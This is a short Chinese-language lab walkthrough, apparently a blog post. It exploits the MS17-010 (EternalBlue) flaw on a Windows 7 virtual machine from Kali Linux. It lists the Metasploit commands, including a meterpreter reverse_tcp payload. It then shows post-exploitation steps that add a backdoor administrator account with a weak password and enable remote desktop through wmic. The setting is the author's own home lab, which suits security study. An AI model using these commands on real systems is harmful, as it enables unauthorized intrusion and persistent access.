环境信息如下

VMWare虚拟机

攻击机：Kali Linux IP：192.168.40.131
靶机：Windows 7 IP:192.168.40.135

物理机系统：windows 11

进入Kali，打开msfconsole

查找相关模块
search ms17-010

使用模块0
use 0

使用payload
set payload windows/x64/meterpreter/reverse_tcp

设置靶机IP
set rhosts 192.168.40.135

接着输入run或exploit执行

这里我们可以看见已经成功打入

输入shell，进入靶机终端

首先创建一个新用户
net user acexze 123456 /add

接着将这个用户设置为管理员
net localgroup administrators acexze /add

然后我们开启靶机的3389端口以供我们进行远程连接
wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1

在物理机上打开终端，开启远程桌面连接
mstsc

进入远程连接界面，输入靶机IP

点击“显示选项”，展开，填入我们新创建的用户
 

这时远程桌面连接会显示，我们点击“是”

靶机桌面会显示

在无操作后30秒，靶机桌面显示

此时我们的物理机也远程连接进了靶机桌面